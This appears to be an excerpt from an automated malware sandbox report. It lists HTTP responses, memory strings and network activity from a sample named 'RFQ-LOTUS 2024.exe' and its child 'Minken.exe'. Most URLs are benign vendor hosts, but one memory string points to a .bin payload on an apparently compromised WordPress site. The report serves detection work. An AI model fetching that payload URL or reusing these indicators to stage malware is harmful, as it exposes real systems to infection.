Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 13:09:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 38 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 62 6f 6c 64 20 31 31 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 e3 80 82 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:09:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Thu, 02 May 2024 13:09:58 GMTServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 34 35 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 03 cf 1d 0c 0c 78 c2 ce d3 5b 02 cc 76 d4 5e a8 cf eb 4a 1e 88 66 fc 7b fe c4 71 c4 37 8b 05 7a 5e bc 5d 79 e2 fd ab b7 a2 53 eb d6 0e 85 23 dc b9 1f 7a 7e 6d ec 2f 85 e3 9c fc 1f 2a 1d cd 23 08 d3 f3 ba fc 4b 4f 58 84 a5 a0 06 fe c8 8f 42 43 4c 57 fe 7c 35 f1 2e 95 28 9a 45 cf bc 95 17 b8 91 8f a1 13 0b 75 86 8a f2 37 6f de 82 9a 8a 24 47 c3 08 c7 c1 7c 1d 89 e8 6a 8d 91 e1 ae d7 8b f9 d8 8d e6 fe aa be 98 7c fd 29 f4 57 80 b7 70 c3 10 ef 98 78 8c 86 99 b7 74 31 e6 d0 dc eb d2 df 18 d9 65 54 1a 94 e4 c0 fc 50 ff 50 97 45 6a 7e 70 56 aa 96 fe 76 16 b8 eb 59 69 f0 3b 0a 13 12 94 fc 16 5d 37 19 07 9b e5 e8 87 79 18 51 99 f9 44 01 18 50 fd 8b e0 cc 0d 26 de 2a f0 fd 65 08 6e d5 36 9f 3f d4 cf fe d8 34 9f 8e e2 9a 0b 59 73 1e 79 4b 02 f2 4a 0e ba 14 1a 7a fe 06 ef 0b 22 78 4a 20 55 f9 b5 1f 62 ec a3 f1 83 66 b5 44 7d 01 f2 be f7 f1 a7 5a 22 8c 7b 89 45 b9 15 64 94 a1 49 ce ec 69 58 8c fb a6 9a f0 e9 96 0d 60 0e c5 80 aa a5 a4 11 ad b8 11 3f f9 91 78 ed 6f 56 13 50 08 ad 7a 3e f7 37 61 21 2a 13 ee dc 7c 34 69 7c 8b be 5a cd ff 60 91 29 ca 68 08 86 59 47 f1 f7 b7 19 58 2b de 61 84 88 ef b8 fb f1 19 fd 0f a0 9b 60 51 84 e3 0b ff cc 2f 0d 12 f6 bd 59 ba 67 de db d1 27 6f 4c 32 56 04 c8 c5 da 51 83 e7 43 7d b3 5e f8 ee 24 fc 50 6f 35 5a 9d 0f f5 46 fb 43 fd bb a3 53 26 92 68 94 24 86 a7 3f bc fd ee ad d3 96 73 c4 a4 f6 69 cd 22 5f 50 9c 3f d4 9f 9a ac f8 81 e8 af ca a9 a8 34 68 75 7b 8d 6a 69 e6 cd cf 66 18 5d ad 56 e7 e8 06 c2 47 4d e2 36 16 40 91 07 0e 08 21 84 f9 9b 10 e3 c4 18 af 17 17 17 b5 29 a6 a6 91 ef 7f 26 e5 f4 a1 fe db bb ef be 79 f7 f2 d5 4f ef de be fd f1 fd 87 3a a8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Thu, 02 May 2024 13:10:01 GMTServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 34 35 34 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 03 cf 1d 0c 0c 78 c2 ce d3 5b 02 cc 76 d4 5e a8 cf eb 4a 1e 88 66 fc 7b fe c4 71 c4 37 8b 05 7a 5e bc 5d 79 e2 fd ab b7 a2 53 eb d6 0e 85 23 dc b9 1f 7a 7e 6d ec 2f 85 e3 9c fc 1f 2a 1d cd 23 08 d3 f3 ba fc 4b 4f 58 84 a5 a0 06 fe c8 8f 42 43 4c 57 fe 7c 35 f1 2e 95 28 9a 45 cf bc 95 17 b8 91 8f a1 13 0b 75 86 8a f2 37 6f de 82 9a 8a 24 47 c3 08 c7 c1 7c 1d 89 e8 6a 8d 91 e1 ae d7 8b f9 d8 8d e6 fe aa be 98 7c fd 29 f4 57 80 b7 70 c3 10 ef 98 78 8c 86 99 b7 74 31 e6 d0 dc eb d2 df 18 d9 65 54 1a 94 e4 c0 fc 50 ff 50 97 45 6a 7e 70 56 aa 96 fe 76 16 b8 eb 59 69 f0 3b 0a 13 12 94 fc 16 5d 37 19 07 9b e5 e8 87 79 18 51 99 f9 44 01 18 50 fd 8b e0 cc 0d 26 de 2a f0 fd 65 08 6e d5 36 9f 3f d4 cf fe d8 34 9f 8e e2 9a 0b 59 73 1e 79 4b 02 f2 4a 0e ba 14 1a 7a fe 06 ef 0b 22 78 4a 20 55 f9 b5 1f 62 ec a3 f1 83 66 b5 44 7d 01 f2 be f7 f1 a7 5a 22 8c 7b 89 45 b9 15 64 94 a1 49 ce ec 69 58 8c fb a6 9a f0 e9 96 0d 60 0e c5 80 aa a5 a4 11 ad b8 11 3f f9 91 78 ed 6f 56 13 50 08 ad 7a 3e f7 37 61 21 2a 13 ee dc 7c 34 69 7c 8b be 5a cd ff 60 91 29 ca 68 08 86 59 47 f1 f7 b7 19 58 2b de 61 84 88 ef b8 fb f1 19 fd 0f a0 9b 60 51 84 e3 0b ff cc 2f 0d 12 f6 bd 59 ba 67 de db d1 27 6f 4c 32 56 04 c8 c5 da 51 83 e7 43 7d b3 5e f8 ee 24 fc 50 6f 35 5a 9d 0f f5 46 fb 43 fd bb a3 53 26 92 68 94 24 86 a7 3f bc fd ee ad d3 96 73 c4 a4 f6 69 cd 22 5f 50 9c 3f d4 9f 9a ac f8 81 e8 af ca a9 a8 34 68 75 7b 8d 6a 69 e6 cd cf 66 18 5d ad 56 e7 e8 06 c2 47 4d e2 36 16 40 91 07 0e 08 21 84 f9 9b 10 e3 c4 18 af 17 17 17 b5 29 a6 a6 91 ef 7f 26 e5 f4 a1 fe db bb ef be 79 f7 f2 d5 4f ef de be fd f1 fd 87 3a a8

Source: svchost.exe, 00000005.00000002.4126707039.0000024951000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000005.00000002.4127786165.00000249510E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 00000005.00000002.4127094977.0000024951062000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1691443532.0000024951218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1691443532.000002495124D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000005.00000002.4127094977.0000024951097000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000005.00000002.4127094977.0000024951097000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
Source: svchost.exe, 00000005.00000003.1691443532.0000024951291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RFQ-LOTUS 2024.exe, 00000000.00000000.1625842032.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RFQ-LOTUS 2024.exe, 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Minken.exe, 0000000C.00000000.2415788858.000000000040A000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000005.00000003.1691443532.0000024951272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000005.00000003.1691443532.00000249512A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.0000024951307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000005.00000003.1691443532.0000024951272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/1
Source: Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/A
Source: Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin
Source: Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.binP

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
